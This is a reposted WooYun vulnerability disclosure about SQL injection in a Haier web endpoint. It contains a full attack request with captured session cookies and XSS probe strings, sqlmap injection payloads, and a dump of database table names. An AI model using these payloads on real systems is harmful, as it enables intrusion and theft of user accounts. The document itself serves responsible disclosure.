海尔集团某处sql注入漏洞(涉及306万账户信息及174万地址信息)

admin
admin
admin
140350
文章
117
评论
2017年4月4日06:23:46评论372 views字数 216阅读0分43秒阅读模式
摘要

2016-03-27: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经确认,细节仅向厂商公开
2016-04-07: 细节向核心白帽子及相关领域专家公开
2016-04-17: 细节向普通白帽子公开
2016-04-27: 细节向实习白帽子公开
2016-05-12: 细节向公众公开

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2016-189551

漏洞标题: 海尔集团某处sql注入漏洞(涉及306万账户信息及174万地址信息)

相关厂商: 海尔集团

漏洞作者: 路人甲

提交时间: 2016-03-27 00:25

公开时间: 2016-05-12 09:17

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 11

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2016-03-27: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经确认,细节仅向厂商公开
2016-04-07: 细节向核心白帽子及相关领域专家公开
2016-04-17: 细节向普通白帽子公开
2016-04-27: 细节向实习白帽子公开
2016-05-12: 细节向公众公开

简要描述:

详细说明:

code 区域 
POST /snaplb/anonymous/topic/portal/getinfo/menulevel.ajax HTTP/1.1
 Content-Length: 165
 Content-Type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
 Referer: http://m.rrs.com/
 Cookie: JSESSIONID=6BB715282853FBB57DCF1DFE2D7962E4; rrs.com_ehaier_sessionid=FEDF8DA0437C291AEE6EDC3567778935; rrs.com_ehaier_refererUrl=aHR0cDovL20ucnJzLmNvbS9tb2JpbGUvaXRlbWxpc3QvODEyLTgyOC5odG1s; rrs.com_ehaier_loginReturnUrl="aHR0cDovL20ucnJzLmNvbS9ycnNtL2pzL3VzZXJDZW50ZXIvdG9waWNUcmVuZHMuanM="; RRSSESS=nbktcaight0u9lpntcj7sa9734; laravel_session=eyJpdiI6InRVZXJTejJrMDFDMjVSOFNiSzBQdmc9PSIsInZhbHVlIjoiSWpVaFgwR1RPMkxVQnRNK2o4UmQ4dGJFZFJITkhqbXhLNDFBM284UUlCUVQwaGt5MjVCakhQbVFPSGdNYjZrbjBJSlZRcWRGTnN3eHlkZVdmdXNNb2c9PSIsIm1hYyI6IjVlYWZlZTMxZDAyYmU4ZmJkYzBjNjFhMzAwOGI4Mjk0NmY5OTA0YmJiNjAyZWI5NGVjN2IwYzliZmUzYzU1NjQifQ%3D%3D; JSESSIONID=4569D02C11EF71F0CAFB0F0A7690BFD8; Hm_lvt_e1b611e8ea607634925d9684f4e559e5=1458241583,1458241633,1458241909,1458241976; Hm_lpvt_e1b611e8ea607634925d9684f4e559e5=1458241976; ZXKJSESSIONID=c0c62de1-1343-ad45-7421-f971c94ccdd0***1; UniqueName=c0c62de1-1343-ad45-7421-f971c94ccdd0; _jzqa=1.560472377653304000.1458241583.1458241583.1458241583.1; _jzqc=1; _jzqx=1.1458241583.1458241583.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'/"><xsstag>()refdxss").-; _jzqckmp=1; _jzqb=1.25.10.1458241583.1; _qzja=1.926454417.1458241583146.1458241583146.1458241583146.1458245661078.1458245666164.%257B%257B_USER__name%257D%257D.1.0.25.1; _qzjb=1.1458241583146.25.0.0.0; _qzjc=1; _qzjto=25.1.0; HMACCOUNT=95BFDBC323634449; BAIDUID=ED24CCC23C3BE7686BBE72E1E8129867:FG=1; _gsref_113428431=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'/"><xsstag>()refdxss"); _gscu_113428431=58241636ioblyg52; _gscs_113428431=582416367giz1z52|pv:4; _gscbrs_113428431=1; NTKF_T2D_CLIENTID=guest13D5BCDF-B906-C5F7-5BE1-A56637825F9A; nTalk_CACHE_DATA={uid:he_1000_ISME9754_guest13D5BCDF-B906-C5,tid:1458241708410836,opd:1}; Hm_lvt_504222469397f794ea8da61f8a4e10e2=1458245176,1458245416,1458245661,1458245666; Hm_lpvt_504222469397f794ea8da61f8a4e10e2=1458245666; SERVERID=517c5a75fca63025cdd23cd01677fbf1|1458242592|1458242592; nTalk_PAGE_MANAGE={|m|:[{|58675|:|417586|}],|t|:|03:09:18|}; v=HRJ>/T(eXv:I(</%cy0e; PHPSESSID=jmrh61au3951s6mclpce3c12j1; Hm_lvt_972125b56f85b5c6ce2c83fd9305649e=1458245416,1458245421,1458245661,1458245666; Hm_lpvt_972125b56f85b5c6ce2c83fd9305649e=1458245666; _pzfxuvpc=1458243216321%7C1051074224135473284%7C9%7C1458245666128%7C1%7C%7C1177309196129166193; _pzfxsvpc=1177309196129166193%7C1458243216321%7C9%7Chttp%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); __xsptplus163=163.1.1458243218.1458245666.20%233%7Cwww.acunetix-referrer.com%7C%7C%7C%7C%23%23KWrgyHYXnfCeTmB1b91bKeoAudzdq5II%23; zid=3a2785ab348b7423d172a4984f56be00; avr_137032388_0_0_4294901760_271286987_0=1846284221_55418697
 Host: m.rrs.com
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
 Accept: */*
 
 codeType=1&codeTypeName=&parent=

codeType参数存在sql注入

海尔集团某处sql注入漏洞(涉及306万账户信息及174万地址信息)

code 区域 
sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: codeType (POST)
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
     Payload: codeType=1' AND (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(3647=3647,1))),0x7170787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rxoO'='rxoO&codeTypeName=&parent=
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: codeType=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jxRE) AND 'MbDQ'='MbDQ&codeTypeName=&parent=
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 15 columns
     Payload: codeType=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7071,0x6c644472464b666b494e,0x7170787071),NULL,NULL,NULL,NULL,NULL-- &codeTypeName=&parent=
 ---
 back-end DBMS: MySQL >= 5.0.0
 Database: snap_haier
 [198 tables]
 +---------------------------------------+
 | activity_clean_code_data              |
 | area_data                             |
 | area_data_bak                         |
 | area_data_bak_13121101                |
 | attachment                            |
 | attitude_of_user_toward_object        |
 | attitude_statistics_toward_object     |
 | best_service_case                     |
 | blog_attachment                       |
 | blog_attachment_download_record       |
 | blog_comment                          |
 | blog_excellent_record                 |
 | blog_image                            |
 | blog_lightblog                        |
 | blog_lightblog_statistics             |
 | blog_like_record                      |
 | blog_report_record                    |
 | branch_record                         |
 | city_data_weather                     |
 | cms_base                              |
 | cms_base_content_ref                  |
 | cms_content                           |
 | cms_content_top                       |
 | code                                  |
 | comment_guide_info_pc                 |
 | comment_guide_info_tbl                |
 | common_click_count                    |
 | content_filter_word                   |
 | credit_blog_record                    |
 | credit_contribution_record            |
 | credit_record                         |
 | credit_setting                        |
 | daily_recommend                       |
 | ds_business_oppo_et                   |
 | ds_room_picture_et                    |
 | ds_room_picture_et_copy               |
 | dynamic_image                         |
 | faq_content                           |
 | feed                                  |
 | feed_all_inbox                        |
 | feed_followed_inbox                   |
 | feed_followed_personal_inbox          |
 | feed_follower_personal_about_me_inbox |
 | feed_follower_personal_inbox          |
 | feed_integrated_inbox                 |
 | feed_topic_followed_inbox             |
 | feed_topic_inbox                      |
 | feed_topic_personal_inbox             |
 | following_count                       |
 | following_log                         |
 | following_relation                    |
 | gf_gift_receive_record_et             |
 | gift_packs                            |
 | gift_packs_detail                     |
 | gift_packs_user_ref                   |
 | hot_lightblog_historical              |
 | hot_lightblog_monthly                 |
 | hot_lightblog_weekly                  |
 | interact_topic                        |
 | interact_topic_category               |
 | interact_topic_comment                |
 | interact_topic_count                  |
 | interact_topic_four_type              |
 | interact_topic_good                   |
 | interact_topic_vote                   |
 | invitation                            |
 | invitation_authority                  |
 | leave_message_tbl                     |
 | lg_interface_invoke_et                |
 | lg_interface_invoke_ht                |
 | lg_job_et                             |
 | login_record                          |
 | ls_appraise_record_et                 |
 | ls_appraise_record_ht                 |
 | ls_workorder_et                       |
 | ls_workorder_ht                       |
 | ls_workorder_waiter_et                |
 | magnetic_stripe_table                 |
 | monthly_top20_blogs                   |
 | mytest                                |
 | notification                          |
 | notification_template                 |
 | parameters_config                     |
 | personal_setting_item                 |
 | personal_setting_item_spec            |
 | personal_setting_value_spec           |
 | prize                                 |
 | product_failure                       |
 | product_pic                           |
 | product_register_record               |
 | recommendation                        |
 | refered_user_recent_record            |
 | register_invitation_code              |
 | register_temporary_record             |
 | rel_wiki_hotkey                       |
 | rel_wiki_one                          |
 | sh_experience_comment_et              |
 | sh_experience_praise_et               |
 | sh_experience_recommend_et            |
 | sh_experience_recommend_ht            |
 | sh_experience_statistics_et           |
 | sh_free_comment_et                    |
 | sh_haier_back_record                  |
 | sh_user_win                           |
 | sh_user_win_comment_et                |
 | sh_user_win_praise_et                 |
 | share_stuff                           |
 | share_stuff_comment                   |
 | share_stuff_good                      |
 | share_stuff_tags                      |
 | social_assess_record                  |
 | st_appraise_record                    |
 | st_social_assess_record               |
 | st_workorder                          |
 | star_shop_table                       |
 | strainer_record                       |
 | sys_data                              |
 | sys_mode_info                         |
 | tag                                   |
 | tag_map                               |
 | template                              |
 | test                                  |
 | tmp_ds_room_picture_et                |
 | tmp_ls_workorder_et_bak               |
 | tmp_sh_user_win                       |
 | tmp_sys_mode_info                     |
 | tmp_user_hits_hot                     |
 | tmp_user_integral_details_all         |
 | tmp_userprofile                       |
 | tmp_userprofile_bak                   |
 | topic                                 |
 | topic_category                        |
 | topic_reply_detail                    |
 | topic_statistics                      |
 | topic_statistics_of_user              |
 | topic_subscription_record             |
 | topic_visit_record                    |
 | unit_base_data                        |
 | unit_base_data_bak                    |
 | unit_house_data                       |
 | unit_house_data_bak                   |
 | unit_house_data_bak_13121101          |
 | unit_house_data_copy                  |
 | unit_house_temp                       |
 | unit_shop_data                        |
 | up_city_info                          |
 | up_codelist                           |
 | up_province_et                        |
 | up_province_et_copy                   |
 | user_account                          |
 | user_account_copy                     |
 | user_address                          |
 | user_address_for_act                  |
 | user_area_record                      |
 | user_authority                        |
 | user_business_authority               |
 | user_daily_recommend                  |
 | user_friends_tbl                      |
 | user_goodskill_rt                     |
 | user_goodskill_rt_bak                 |
 | user_hits_hot                         |
 | user_integral_details_all             |
 | user_integral_details_one             |
 | user_integral_grade                   |
 | user_integral_prize                   |
 | user_integral_source                  |
 | user_refer_record                     |
 | user_regist_tbl                       |
 | user_related_policy                   |
 | userprofile                           |
 | userprofile_achievement               |
 | userprofile_bak                       |
 | userprofile_complete_degree           |
 | userprofile_education_experience      |
 | userprofile_obtain_phone_record       |
 | userprofile_project_experience        |
 | userprofile_project_experience_detail |
 | userprofile_skill_support_record      |
 | userprofile_skill_support_statistics  |
 | userprofile_statistics                |
 | userprofile_training_experience       |
 | userprofile_work_experience           |
 | value_added_products                  |
 | visit                                 |
 | vote                                  |
 | vote_detail                           |
 | vote_option                           |
 | vote_result                           |
 | water_purifier                        |
 | web_click_count                       |
 | web_click_uv_count                    |
 | wiki_base                             |
 | wiki_base_content_ref                 |
 | wiki_content                          |
 | wiki_content_top                      |
 | winning_info                          |
 | world_cup_activity_tbl                |
 | world_cup_support_num                 |
 +---------------------------------------+

海尔集团某处sql注入漏洞(涉及306万账户信息及174万地址信息)

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-28 09:17

厂商回复:

感谢白帽子的提醒与测试,已安排人员进行处理

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin